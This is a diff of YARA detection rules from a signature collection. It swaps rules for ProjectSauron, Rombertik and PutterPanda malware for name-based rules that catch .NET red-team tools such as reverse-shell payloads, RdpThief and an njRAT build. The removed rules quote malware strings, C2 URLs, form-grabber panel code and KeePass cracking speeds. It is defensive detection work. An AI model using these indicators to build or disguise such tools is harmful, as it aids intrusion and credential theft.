 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9b36f2f1161fd2ff856db520efca8648892656b7a2587dce1a7445af4fbba013"
+		logic_hash = "89f3bf4b81a901e813c3021422c362d7e075dec7fd76240be121f677039f1994"
 		score = 75
-		quality = 60
+		quality = 85
 		tags = "FILE"
-		version = "1.0"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$vfs_header = {02 AA 02 C1 02 0?}
-		$salt = {91 0A E0 CC 0D FE CE 36 78 48 9B 9C 97 F7 F5 55}
+		$name = "FudgeC2" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( @vfs_header < 0x4000 ) or $salt ) and math.entropy ( 0x400 , filesize ) >= 6.5 and ( filesize > 0x400 ) and filesize < 10000000
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_Apt_Projectsauron_Encryption : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Nativepayload_Reverse_Tcp : FILE
 {
 	meta:
-		description = "Rule to detect ProjectSauron string encryption"
-		author = "Kaspersky Lab"
-		id = "b3139045-54f5-5d59-980b-8510faa9ad0e"
-		date = "2023-12-05"
-		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_project_sauron.yara#L105-L123"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "a6b935cc-adb6-5ff4-a832-1043e77292f7"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/DamonMohammadbagher/NativePayload_Reverse_tcp"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L481-L494"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ae3a681b0cf9ed93d25fa35982daab48c460ba9737eb643ba28a972ea3a7b401"
+		logic_hash = "055ee105cd46e54b4f49dd92975ecc08a6184fa8508585ee528d19de34914758"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		version = "1.0"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a1 = {81??02AA02C175??8B??0685}
-		$a2 = {918D9A94CDCC939A93939BD18B9AB8DE9C908DAF8D9B9BBE8C8C9AFF}
-		$a3 = {803E225775??807E019F75??807E02BE75??807E0309}
+		$name = "NativePayload_Reverse_tcp" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		filesize < 5000000 and any of ( $a* )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_Apt_Projectsauron_Generic_Pipe_Backdoor : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Sharphose : FILE
 {
 	meta:
-		description = "Rule to detect ProjectSauron generic pipe backdoors"
-		author = "Kaspersky Lab"
-		id = "77a82c67-7ee1-5d1f-ad75-28ce174e41bc"
-		date = "2023-12-05"
-		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_project_sauron.yara#L125-L144"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "89b00eb0-f1a2-5c77-a5b0-2329b08aadb7"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/ustayready/SharpHose"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L496-L509"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ec8a311ec1bd98532c278f72c77e58edb5890db940046dfcd14adf1495e9de1e"
+		logic_hash = "e3af2a156c2451f7ed2fe3e888fdf2ae080298f7eff56801ddc0c612f04902ee"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = "FILE"
-		version = "1.0"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a = { C7 [2-3] 32 32 32 32 E8 }
-		$b = { 42 12 67 6B }
-		$c = { 25 31 5F 73 }
-		$d = "rand"
-		$e = "WS2_32"
+		$name = "SharpHose" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of them ) and filesize < 400000
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_Rombertik_Carbongrabber : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_RAT_Njrat_0_7D_Modded_Source_Code : FILE
 {
 	meta:
-		description = "Detects CarbonGrabber alias Rombertik - file Copy#064046.scr"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b3aee336-9f3b-5fae-928d-8357408a7b69"
-		date = "2015-05-05"
-		modified = "2023-12-05"
-		reference = "http://blogs.cisco.com/security/talos/rombertik"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_rombertik_carbongrabber.yar#L10-L31"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "2b7d1f75-0164-561e-8199-32c601cbca98"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/AliBawazeEer/RAT-NjRat-0.7d-modded-source-code"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L511-L524"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ddc3ebcc460909a4afc9994cae53c9b7642f92ab6f16e2653f6b2d5002a33cda"
+		logic_hash = "f437195348452242adc8b55d6d517a17764c53188fa2de5cd15848fd23827381"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2f9b26b90311e62662c5946a1ac600d2996d3758"
-		hash2 = "aeb94064af2a6107a14fd32f39cb502e704cd0ab"
-		hash3 = "c2005c8d1a79da5e02e6a15d00151018658c264c"
-		hash4 = "98223d4ec272d3a631498b621618d875dd32161d"
 
 	strings:
-		$x1 = "ZwGetWriteWatch" fullword ascii
-		$x2 = "OutputDebugStringA" fullword ascii
-		$x3 = "malwar" fullword ascii
-		$x4 = "sampl" fullword ascii
-		$x5 = "viru" fullword ascii
-		$x6 = "sandb" fullword ascii
+		$name = "RAT-NjRat-0.7d-modded-source-code" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 5MB and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_Rombertik_Carbongrabber_Panel_Installscript : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Rdpthief : FILE
 {
 	meta:
-		description = "Detects CarbonGrabber alias Rombertik panel install script - file install.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f6c04e27-bbab-5012-a4f9-71d49d252b83"
-		date = "2015-05-05"
-		modified = "2023-12-05"
-		reference = "http://blogs.cisco.com/security/talos/rombertik"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_rombertik_carbongrabber.yar#L33-L53"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "5ad4feec-50db-5ebb-a609-9196e72a24aa"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/0x09AL/RdpThief"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L526-L539"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "cd6c152dd1e0689e0bede30a8bd07fef465fbcfa"
-		logic_hash = "a0edc53aea21bc317f510a4a463ca677d9dc1ec234ca9824bc46711c851f2ccc"
+		logic_hash = "8e472c8265d517e512eada819627d56ff449fae4d80054946e9ea96f74004f05"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "$insert = \"INSERT INTO `logs` (`id`, `ip`, `name`, `host`, `post`, `time`, `bro" ascii
-		$s3 = "`post` text NOT NULL," fullword ascii
-		$s4 = "`host` text NOT NULL," fullword ascii
-		$s5 = ") ENGINE=InnoDB  DEFAULT CHARSET=latin1 AUTO_INCREMENT=5 ;\" ;" fullword ascii
-		$s6 = "$db->exec($columns); //or die(print_r($db->errorInfo(), true));;" fullword ascii
-		$s9 = "$db->exec($insert);" fullword ascii
-		$s10 = "`browser` text NOT NULL," fullword ascii
-		$s13 = "`ip` text NOT NULL," fullword ascii
+		$name = "RdpThief" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		filesize < 3KB and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_Rombertik_Carbongrabber_Panel : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Runascs : FILE
 {
 	meta:
-		description = "Detects CarbonGrabber alias Rombertik Panel - file index.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f6c04e27-bbab-5012-a4f9-71d49d252b83"
-		date = "2015-05-05"
-		modified = "2023-12-05"
-		reference = "http://blogs.cisco.com/security/talos/rombertik"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_rombertik_carbongrabber.yar#L55-L73"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "c5fc5b01-1d30-5af5-be99-e629cb23295b"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/antonioCoco/RunasCs"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L541-L554"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "e6e9e4fc3772ff33bbeeda51f217e9149db60082"
-		logic_hash = "8b7fde3c3894b7aa83e05f6a1b820195276f8738fde218485c0465afaed88427"
+		logic_hash = "9fd22a3e92222134c101693b944a2ad53055f9cfafe99823fd6f412981f5afa3"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "echo '<meta http-equiv=\"refresh\" content=\"0;url=index.php?a=login\">';" fullword ascii
-		$s1 = "echo '<meta http-equiv=\"refresh\" content=\"2;url='.$website.'/index.php?a=login" ascii
-		$s2 = "header(\"location: $website/index.php?a=login\");" fullword ascii
-		$s3 = "$insertLogSQL -> execute(array(':id' => NULL, ':ip' => $ip, ':name' => $name, ':" ascii
-		$s16 = "if($_POST['username'] == $username && $_POST['password'] == $password){" fullword ascii
-		$s17 = "$SQL = $db -> prepare(\"TRUNCATE TABLE `logs`\");" fullword ascii
+		$name = "RunasCs" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		filesize < 46KB and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_Rombertik_Carbongrabber_Builder : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Nativepayload_IP6DNS : FILE
 {
 	meta:
-		description = "Detects CarbonGrabber alias Rombertik Builder - file Builder.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "3233c139-ac06-576c-9870-51306d5aa385"
-		date = "2015-05-05"
-		modified = "2023-12-05"
-		reference = "http://blogs.cisco.com/security/talos/rombertik"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_rombertik_carbongrabber.yar#L75-L92"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "3b32b408-e71a-5f2a-ae6f-72a3d6572b71"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/DamonMohammadbagher/NativePayload_IP6DNS"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L556-L569"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b50ecc0ba3d6ec19b53efe505d14276e9e71285f"
-		logic_hash = "e9d13913ee03926920eba33a4dac2a6e9aeaaa54949c5bfea8dd956cf233abae"
+		logic_hash = "509c396b97524335735107644460eebed3146b2bc5f8dedb909c9754b2121f5f"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "c:\\users\\iden\\documents\\visual studio 2010\\Projects\\FormGrabberBuilderC++" ascii
-		$s1 = "Host(www.panel.com): " fullword ascii
-		$s2 = "Path(/form/index.php?a=insert): " fullword ascii
-		$s3 = "FileName: " fullword ascii
-		$s4 = "~Rich8" fullword ascii
+		$name = "NativePayload_IP6DNS" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 35KB and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_Rombertik_Carbongrabber_Builder_Server : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Nativepayload_ARP : FILE
 {
 	meta:
-		description = "Detects CarbonGrabber alias Rombertik Builder Server - file Server.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "742003a2-3716-5ad9-a720-b9e2be71554a"
-		date = "2015-05-05"
-		modified = "2023-12-05"
-		reference = "http://blogs.cisco.com/security/talos/rombertik"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_rombertik_carbongrabber.yar#L94-L117"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "9fac11f8-4e40-5cbc-a990-2ae48df20828"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/DamonMohammadbagher/NativePayload_ARP"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L571-L584"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "895fab8d55882eac51d4b27a188aa67205ff0ae5"
-		logic_hash = "693c92128166c72aded066fa66eef906a9f6027c65b889f3a487a38382f29982"
+		logic_hash = "e8cecfe09f1cb80eb693eb293dfb8c1bc3885a96dfa045b2391216c5f6f6f983"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "C:\\WINDOWS\\system32\\svchost.exe" fullword ascii
-		$s3 = "Software\\Microsoft\\Windows\\Currentversion\\RunOnce" fullword ascii
-		$s4 = "chrome.exe" fullword ascii
-		$s5 = "firefox.exe" fullword ascii
-		$s6 = "chrome.dll" fullword ascii
-		$s7 = "@KERNEL32.DLL" fullword wide
-		$s8 = "Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome" ascii
-		$s10 = "&post=" fullword ascii
-		$s11 = "&host=" fullword ascii
-		$s12 = "Ws2_32.dll" fullword ascii
-		$s16 = "&browser=" fullword ascii
+		$name = "NativePayload_ARP" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 250KB and 8 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_VULN_Keepass_DB_Brute_Forcible : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_C2Bridge : FILE
 {
 	meta:
-		description = "Detects KeePass .kdbx password stores, which could be brute forced to steal the credentials. With AES-KDF and less than 65536 iterations the cracking speed with a single GPU is 20k/s, for the old default of 6.000 iterations it's 200k/s. Best remediation is to change the key derivative function to Argon2d and delete all older versions of the .kdbx"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "b1a86e03-b3d1-5abc-9287-a4846451caff"
-		date = "2023-07-20"
-		modified = "2023-12-05"
-		reference = "https://keepass.info/help/base/security.html#secdictprotect"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/vuln_keepass_brute_forcible.yar#L2-L17"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "357051aa-61ea-5454-a996-b4e3a45ac865"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/cobbr/C2Bridge"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L586-L599"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "14460f7d4976a3bbd6de2f7cfccfbfec35eb780ab762396a6490669ddde59ce8"
-		score = 60
+		logic_hash = "d5f6d6e9d475bf2d8a49d7550bf3b718539753f3494b58462094bfc0a37b813a"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$keepass_magic = { 03 D9 A2 9A 67 FB 4B B5 }
-		$below_65536_rounds = { 06 08 00 ?? ?? 00 00 00 00 00 00 07 10 00 }
+		$name = "C2Bridge" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		$keepass_magic at 0 and $below_65536_rounds at 108
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_APT_Malware_Putterpanda_Rel : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Infrastructure_Assessment : FILE
 {
 	meta:
-		description = "Detects an APT malware related to PutterPanda"
-		author = "Florian Roth (Nextron Systems)"
-		id = "980922cb-edfb-50ab-a102-a8168aa2b0e0"
-		date = "2015-06-03"
-		modified = "2023-12-05"
-		reference = "VT Analysis"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_putterpanda.yar#L1-L27"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "efacc12b-92b3-5b22-b5bb-cd5a7d7eea0e"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/NyaMeeEain/Infrastructure-Assessment"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L601-L614"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "5367e183df155e3133d916f7080ef973f7741d34"
-		logic_hash = "f2ffab73993c578f47e17babc2e65301b3720e438b33e57f2af31b7183bfd20f"
-		score = 70
+		logic_hash = "7b2f1481c2880b5b3ee158f2a526ab7fc5e587bbf3847ebe9ddf447742109a78"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x0 = "app.stream-media.net" fullword ascii
-		$x1 = "File %s does'nt exist or is forbidden to acess!" fullword ascii
-		$s6 = "GetProcessAddresss of pHttpQueryInfoA Failed!" fullword ascii
-		$s7 = "Connect %s error!" fullword ascii
-		$s9 = "Download file %s successfully!" fullword ascii
-		$s10 = "index.tmp" fullword ascii
-		$s11 = "Execute PE Successfully" fullword ascii
-		$s13 = "aa/22/success.xml" fullword ascii
-		$s16 = "aa/22/index.asp" fullword ascii
-		$s18 = "File %s a Non-Pe File" fullword ascii
-		$s19 = "SendRequset error!" fullword ascii
-		$s20 = "filelist[%d]=%s" fullword ascii
+		$name = "Infrastructure-Assessment" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and 1 of ( $x* ) ) or ( 4 of ( $s* ) )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_APT_Malware_Putterpanda_Rel_2 : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Shellcodetester : FILE
 {
 	meta:
-		description = "APT Malware related to PutterPanda Group"
-		author = "Florian Roth (Nextron Systems)"
-		id = "3eef8869-45d6-57a4-a182-c5349b034cf4"
-		date = "2015-06-03"
-		modified = "2023-12-05"
-		reference = "VT Analysis"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_putterpanda.yar#L30-L59"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "964093a4-e6d7-51b7-928a-b1cd40dc11cc"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/tophertimzen/shellcodeTester"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L616-L629"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "f97e01ee04970d1fc4d988a9e9f0f223ef2a6381"
-		logic_hash = "60a48288cb106135728fb676ecad2b9be5254d5dc5094da158ea9dc07704c9ab"
-		score = 70
+		logic_hash = "3101b62428eba5e36572a190bd3a11f59cf9cca10aec3cfe3000028f1b1f0a3f"
+		score = 50
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "http://update.konamidata.com/test/zl/sophos/td/result/rz.dat?" fullword ascii
-		$s1 = "http://update.konamidata.com/test/zl/sophos/td/index.dat?" fullword ascii
-		$s2 = "Mozilla/4.0 (Compatible; MSIE 6.0;)" fullword ascii
-		$s3 = "Internet connect error:%d" fullword ascii
-		$s4 = "Proxy-Authorization:Basic" fullword ascii
-		$s5 = "HttpQueryInfo failed:%d" fullword ascii
-		$s6 = "read file error:%d" fullword ascii
-		$s7 = "downdll.dll" fullword ascii
-		$s8 = "rz.dat" fullword ascii
-		$s9 = "Invalid url" fullword ascii
-		$s10 = "Create file failed" fullword ascii
-		$s11 = "myAgent" fullword ascii
-		$s12 = "%s%s%d%d" fullword ascii
-		$s13 = "down file success" fullword ascii
-		$s15 = "error!" fullword ascii
-		$s18 = "Avaliable data:%u bytes" fullword ascii
+		$name = "shellcodeTester" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 6 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_APT_Malware_Putterpanda_PSAPI : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Gray_Hat_Csharp_Code : FILE
 {
 	meta:
-		description = "Detects a malware related to Putter Panda"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e074ab8a-2ca4-579e-aaef-cdfb9c64b21b"
-		date = "2015-06-03"
-		modified = "2023-12-05"
-		reference = "VT Analysis"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_putterpanda.yar#L61-L79"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "0a94cadc-cc7b-5817-8788-bb1e53937fad"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/brandonprry/gray_hat_csharp_code"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L631-L644"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "f93a7945a33145bb6c106a51f08d8f44eab1cdf5"
-		logic_hash = "b73f1db2ca8a3164562314ebd9903c864eb2690c95731959df0e99656544ed40"
-		score = 70
+		logic_hash = "4520528cd6b1832c97fa79442f9d448d54bad4e6944984fa6e71f34246259e28"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "LOADER ERROR" fullword ascii
-		$s1 = "The procedure entry point %s could not be located in the dynamic link library %s" fullword ascii
-		$s2 = "psapi.dll" fullword ascii
-		$s3 = "urlmon.dll" fullword ascii
-		$s4 = "WinHttpGetProxyForUrl" fullword ascii
+		$name = "gray_hat_csharp_code" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_APT_Malware_Putterpanda_WUAUCLT
+rule SIGNATURE_BASE_HKTL_NET_NAME_Nativepayload_Reverseshell : FILE
 {
 	meta:
-		description = "Detects a malware related to Putter Panda"
-		author = "Florian Roth (Nextron Systems)"
-		id = "5c8e0629-b5f2-5933-8c74-c49b756aaf18"
-		date = "2015-06-03"
-		modified = "2023-12-05"
-		reference = "VT Analysis"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_putterpanda.yar#L81-L108"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "eec77c09-02db-5d74-8526-e201d2fe6fc8"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/DamonMohammadbagher/NativePayload_ReverseShell"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L646-L659"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "fd5ca5a2d444865fa8320337467313e4026b9f78"
-		logic_hash = "49cae3b727d6b2673dc9a6497d59c9abdd78d486e1eaf6f036f6eb1aef9a8fcb"
-		score = 70
+		logic_hash = "79ebde95674d76e58938b06a97cb6c65e6ac0606398fc9c30d90e517bbdd62a8"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x0 = "WUAUCLT.EXE" fullword wide
-		$x1 = "%s\\tmp%d.exe" fullword ascii
-		$x2 = "Microsoft Corporation. All rights reserved." fullword wide
-		$s1 = "Microsoft Windows Operating System" fullword wide
-		$s2 = "InternetQueryOptionA" fullword ascii
-		$s3 = "LookupPrivilegeValueA" fullword ascii
-		$s4 = "WNetEnumResourceA" fullword ascii
-		$s5 = "HttpSendRequestExA" fullword ascii
-		$s6 = "PSAPI.DLL" fullword ascii
-		$s7 = "Microsoft(R) Windows(R) Operating System" fullword wide
-		$s8 = "CreatePipe" fullword ascii
-		$s9 = "EnumProcessModules" fullword ascii
+		$name = "NativePayload_ReverseShell" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		all of ( $x* ) or ( 1 of ( $x* ) and all of ( $s* ) )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_APT_Malware_Putterpanda_Gen1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Dotnetavbypass : FILE
 {
 	meta:
-		description = "Detects a malware "
-		author = "YarGen Rule Generator"
-		id = "5e7910e7-3f33-50fb-a87f-bf0bbf8a2797"
-		date = "2015-06-03"
-		modified = "2023-12-05"
-		reference = "not set"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_putterpanda.yar#L110-L131"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "918eba2b-150d-5e69-bed0-0979ae889165"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/mandreko/DotNetAVBypass"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L661-L674"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
